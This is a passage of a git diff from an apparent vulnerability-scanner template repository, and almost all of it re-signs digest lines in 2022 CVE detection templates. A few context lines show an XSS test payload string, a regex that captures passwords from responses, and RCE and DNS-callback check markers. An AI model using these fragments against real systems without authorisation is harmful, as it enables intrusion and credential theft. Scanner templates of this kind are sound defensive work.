'status_code_3 == 200' - contains(body_3, 'admin-name\">{{str}}') condition: and -# digest: 4a0a0047304502200260f1d81ea298c0298f44f3ef3ee75de3c2779b7870077c7a54c55526f150e6022100b1cfcd5b8d8da68b83cab3ce4e5bbf99f031a927741f508f1c641d219ffe5719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100acfc88fbb67d2cd5843df7db44031e80d4a2fd12170e0c9205adb18f6081f720022100c8df692fe6c6ee79c6cf269b63c7fae88c0b48be07ca0fdc16731a06f62d23c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 3aa3bf5b6e..f90bd6b2bc 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b032a0928542b07c129e656f021862237782c6d5334e70b894ab4ebcca9585c4022100f96c4c46eee96e11abe556a475886c305dbe89a53f3ba87b4a652358759cead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b77fdc0e3ddf8c8bc57ec5a424048ad33578c5a442f8570831738bd54171d38002207fe758e52bbb68d686119cde5763c863fed543019e5fcb412fb951e7b82ba8fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 10e67c06fc..4791e1ff5a 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220552b4e4f1d6369c8da564385c27795297aaf3b1f860d3b125ab77765ac1032b60221009429073918c60b64bc35a1f86bcedf480353c7fc21d5f1363a841d0a24dd02d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c83e9d222849e81f3fb3d97e70cbd890771c80f19edb39f41c5893845fe26ec7022100fe965f23bff4bf73806c8ab70ccbac15066128210d499421fdc12544efe61d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 8ac7e7ccac..25114843fb 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c4332b09e1cc097f4cca16a0121cafbffab109672f9245168e86edf8bf26a0c902210099acc93d9117952cce48b5e857f1d8151fc10df6beebece0164404381d30a846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000db0cd0885747935dbc46e33eb6d39fe6e402cd98a32c27aace125930bb5e02022033d3891f676061411566d32cc3a2628d0bb645c1dbb89d4da9deaf4ec4781f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index 27c001979f..bb4e940017 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207cbb58a7c97c66bfec2ae1b2ea9efe5dd2c11d2f9ce7517c4f72aa7e6508b86002204dbae1299fc556dc6cc9ac476fb7c9c775c572f5aff45a220b6738b28985bd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220110ece90c552286c24275c2bed1e476aaf125bd1e88aa73d6231ada8c3a7d5e3022100cb24d2c8d63917c983e839ee3e8596a4d8dd067b2be44d13a3e229e15a806aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index e1b06ad89f..f95cafd172 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034aff64154b2b68ec30a164da469d16aa15387ce3d24676fb525864618d93cc302205fed4749cfb4201b9206d98b654c1109275383c56007c6ab53c3499683543033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 9154676875..5d38f23550 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -48,4 +48,4 @@ http: part: body words: - You are viewing page number -# digest: 4a0a0047304502203db3f45d8e15e58d60c2a0c268f52014feead1fa99568158768c91a2580e313b022100efb19def318800319766279d5e0fbf144650bf5b861b85f3f6bfa291878bd107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afb6acf46e188f010c99e8bddfbd508e62a1c34e3de7cc56d83a8538a16929f602200b75c244bf4ca105f25c7fdd2fc3ac5482cd4b7fdd21ca483cb95ffe11520409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index e0f0a073a9..5145a0635b 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100ad57775f28b340323e6c238f83d7ff7d527ca0f9ea5bad34f1516a2ced3e64c7022057c3fb9256242477b86e3a94db3ab1e5b0992646c61019b6e2eb284ae7e03696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3958c2c011954e33399bf7bbb65931a43f437a82f6ccf7407b9db4222e85447022100e2d0cf9d7028f557f4dc83c56caf8cc23310112abd333fe0ee21746c6d29398f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 3b6365097a..9a4b9d84ab 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -62,4 +62,4 @@ http: - "" internal: true part: body -# digest: 4a0a00473045022100cbdf04a44be30b745acc991c58c7b30bd5887bf49b11309c5a3e02a096fa0d0a0220210e11532a685f0239900f6aab1e5862ec23a6a9c30af08dda63ee08c7bd2ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201426a56cfb1ab3a352f1f1604646839ac31e772a168ec6bb1d200bc2013433ce0220086f2bed2bdfbc803b4ea906fd4cc4e9d57bc183c59bc216e86aef876d19fc73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index b4868355be..fa1e4c5e5b 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205da79e19dbf42fb4a7fc28766ee1e0da9a23958c5c0bfd57073840286d9f500b02204d3d7749e0da21b52ce93cc9de4bbbc17a65d9a761c5f4a466a4596caaabe6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index a4ab37242f..f521195e84 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -56,4 +56,4 @@ http: part: body words: - "p1_network_mail.cgi" -# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b70e613d09fa2a711de3a0758614accfd68df4921aaf5b9ada5d295416866de702201e1dcb85461c584db1a0e90896dda04b3f751d8b0033b089fd5eaf0119138cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index e79c758f4d..28da09bfa3 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ef58e2fe8d3135a84c8de1c0e8768da7b5e0d6b8ad3771ae9495f44cdff423302201139897fc4641b2c9df1965cd6cefb0377632f5366b8f0e0c20be07316136cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027dc1fba3357657f2339307312517be5c53ff3f1e231f085435c34330d69fc08022100ba2b369ebf9eecb75fbdd2bb7025b70b4298bb0ce1017bd3edf20f3a4aa6e17c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 5ba976405e..b8bd54deeb 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -55,4 +55,4 @@ http: - type: dsl dsl: - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" -# digest: 4a0a0047304502206626d39352045dab0703dbd61d9cecafd6e7f18e8d9316bef52d936ca126b399022100d448de4461fe4835998a05ef187668142f89f7025b11abe66e0e3305508c1171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200dd50ee86b21136b9d8fc38b35acb9a7800dcd74b828eb589b4ea9d724b97486022100ce0263089519776aefede01c382dd8d1424c666227ac596b5f7331dd3c561059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index a53b6d6ba5..d1d83d95df 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0daab3631f2436ac3fedaa0e30b87d965c744a64438c8d7a23a9e6cfdf7d86402202fedf1fa413e80ab071388a7442509adbad1a2fae90dbd04acf08d7d190531d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 331b043b0a..ce8893b72c 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202266b24b3ca73622ae1a9a90ed2ca8a2800fd51395203f79212cca3efcca657c022072817838ecc6d8bcfbefc1ed8b599b073956b1ea37fbd0821541a08b1e56798d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f66693ec490c67edad9951389cc345616404a66cd30fe4c01b8e6a480213c89902207884268f4572ca2d4de2cf6189f994d1592968d617e1171dd1c8390598557fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index e87dff8fb3..2a5318cacd 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -77,4 +77,4 @@ http: - '' internal: true part: body -# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2a548c5526e06565ede6b31dec394968ae49e92e911f9c3b895a967aa6b9d710221008fca32c04e5b0118fad8d67392dd3458f800c555df646fd1ceb93919c796b35d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 42de1b227b..07dc5b0c16 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d822dff0574465d8a236c0a3870120599040c4db420b664f999ee7a8bd85a4c022100ac896d98c593e565e87bb82d39c3db64677b4fb25123f2bb215adda4397be8ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 60a6709c6f..80ba951e59 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d4c2cf954be9043250ab16a537e7ef2675f66c8ba097f50d00faccf56e535f5022100921f7c12c1750864df6c558bcfbaf3b6796d0eeba2782990b6e5755840d26fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b603767072813d1d972d5734a85e2484bc7f20d4410824e0eb190c8aa6a8cb33022100a1a523dad3c7a19c97cfdc520d66be3d136c6cdd093ce3e8e757f9a83f0b6eef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 1e65f7cf2a..999661ce06 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f51d34e60e24572e53cca55a63fc56858713ebaa30f1c8f90425d33757b4f9b9022100d8c7a253b77a98d64f858300650effefd11d7c674865afec60ae7545b4bdeca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index bccd71b102..2588d2fd9f 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db80c5daae7962f88a3650a7260e0d4ff08b91cb3a3f18dc558c2bf525d40a702205f244cd37a1a7b7b43f61de7bd12c19c0ad397946f36f6dd0196b105f4c201fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 17be50d07e..4d537b973c 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "ee-simple-file-list")' - 'contains(body_2, "onanimationstart=alert(document.domain)//")' condition: and -# digest: 4a0a004730450221009b8058e2d09fded7acc96d56479398cd66ad473245c9a0aedcd58109aade3dc502204b7c40619880f5fc9c9742dedc31da8c5ec37f59fe121a562c11d2884098bb5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205105897f44d3816c47769c41fc4f3e93973ada3af56d974861f4e7935c3a85eb02203b4ec0b0e762749d37c743f15a512487d8019f7dc0a6b62066555b4449038171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index be13eda8b4..d0de8e9479 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c82f1ca657f09b291726404df01aebad442149a633e659a5ac883843d2731477022100941da06ae2c61be7bd56f19c40662273ad5d0668821e4da881f35ffce57e9022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 0d7912c735..75745cda14 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220634b81869df2bf0db593182910f955450fa2f12d30aaee90acfadbb3286cd88b022100c42dca46f190441bfb161586423325d0d9db357848c64655dce0f970052d11a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 4c28485bfe..a0d248be53 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b62ee1fc2b390ceedb98cf2c4afd3197761c422ed124b50731699ea4fc630c8022100b29bb172311fa5f266e4cc22925d9cedb496625617690c4998424a99466f7872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index bb46253f20..3df8c7c7fe 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074bff597a7bd921590811d09452dde5bbc69ffe1e382bc206471581e35a995230220300b8fb359c3f27c62cb5b7c60b73089dca648fc900c4da96f09859f1e57684b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index e3a3702a31..84f1d81054 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -60,4 +60,4 @@ http: - type: regex regex: - Password='(.+?)' -# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfa874c9fcc0869f067c98760eca4e1d0663d7543862826e233a53d3eba4a17502201d2069ee57f63c3a10df5dce882a57b4b7a8d16215910078bdc998bde72b6728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 37e7f0d9d4..8590a9e9ab 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e198facad20dc156feda279d1ce49117cb3d0baf80f67f7e1309efc885bbfe0e022002895be93b1e631fb4d53c0c2f701b0db0afe312b24eca373958d7eb78c65b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dff58767b787b7b639f7569d4423daf863148beaf088a6a9349f37a857155620220700c4a0ab6535260a55a62d87338a1dcb2f37b1ba0c273a1af6d4b1b271cf2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 90ee57503b..418d12f78e 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005854ebaa443b16f3f41e3782b2ee5a1f6b482d463dfc3a422877fd53842740b022100b2d2b410318fe04b6e4f42512938d230696fffc7ae75ff604c61d35deceffa88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index b4535f5091..7ba5b1420f 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -49,4 +49,4 @@ http: - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and -# digest: 490a00463044022053c6c0b414614939f1d2b380003b62e3c5c2ad61ebb65e15a4655208c25c77ac022019921227f71829241115d45ac485c1a8d6378801ec680e5c9dc2b0ac2f7ebd44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fa756991c824d75f54e7ab7d21a442da31e45c1e7ef3f353c4caf8cfd0a7eca022100960d6a4ed91938e77a67967bbf589e86f0ba96b8419323af2ee2c99d3e736dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 0fb55b42d8..868f59a5de 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6f839aa07c291bcf634657c72c8b9d073ad71f8b899ad14dcf441dad5ba7992022100a13e181c5d976e18ae140c9bf7e3bf94671fa0011b59e452e2d1a48c0e93eb1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 6da156ed2b..7d4a8910b2 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb608d3c7606444f4d69cb86e3798c329381935f7ce2b8f597db966538470478022100b2a3625ef714bb2445f277bfeba155bfadeedf3b024167a2a444ed73a9ab335c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index ba09e64ef6..70740b75d8 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -56,4 +56,4 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" -# digest: 4a0a00473045022100ba04d468e5a36b316af5cde0bdfdce8d0e404952c265bdef97fb533f492ecc530220344972954e1c9bedcfeea63f373297c16cf7a9cf1c8cd580f99a97a6662fbae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061419438c8476d852bc22439b5c66b71568aad15d15612a46c47e36f01fe39480220765d71411609420dc5e405527ddf064c99aebf007b49df48f136a41430a61e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index a0a73f46e6..a052ca9bf8 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220320f5afe5b1b728587b2540cc0f8d5f61452ff54c986c8f7eadc1856f0a905ec022100d8f3ff9a7705d462d45e1199ba0ee430e88585bafcfc874820c5f88ddc76dbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100991d2a3d15ef7d8f4bf9e9c7e600f7251f7d6894facb0f74b95a751e8c0a276e022100e4453b11ed4b542538dbf80a3f7483fe26d45351fda80946ee0f0848ad4d70ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 35cedf4b58..0558a8bf2d 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b9cd4b97ec4bf8df3c4a6c42dd322e42e6b9775243e3e0d725974ef0a3ba64c0022100f77e80b869527ee2c9ea6cae10ddb889a57d738ce645695ce451f64db8a8eae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b7d2abc2478879f4c7d2fe00975606179fa0216d985b54ca70cf12a3711006d02204dd00dd4f1118a8264beda2398cdee9f28f6d25b9a5011ab116b6b05bba0bbcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index b97b3dc4a2..de254b0f4b 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202db1124164825b434395a0b2ed0eaadb8991a9b259a4aca81bd4c657793b8da0022100d3a817be0f73d3bf46078f8483bf8c513a3047485830b59564d7d136ce67632e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf632e6f4e2be66b5072e4d4fb65789927db670551a3b6bf36cd884c9a3be79f0220530a440be7f1e53d5f03b2305218bc0620f63f4f61bcd54517164a60896f2a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 6ca41201a2..82e1c2c09f 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -92,4 +92,4 @@ http: regex: - name="CSRF_token" value="([0-9a-zA-Z]+)"/> internal: true -# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b7aff62a84e4d74dfe0abefbe9ee6103c0ad1dc7a970a049eb98aa5d5841e53022100b8e80b19776099cfc3452a641dd41a3d64f1e5b6636842044c2d6628ec9a32e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 182a1275bf..65e844b0f9 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -48,4 +48,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Dashboard")' condition: and -# digest: 490a0046304402200b95b388c981218ff2010a5af1002d6e6eccdcf8edf8a660ea9c6ce4483c07d20220773161e78dd1caf3ee58849de5a6107b7470729bdf71f8122d9bd4e60641cbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 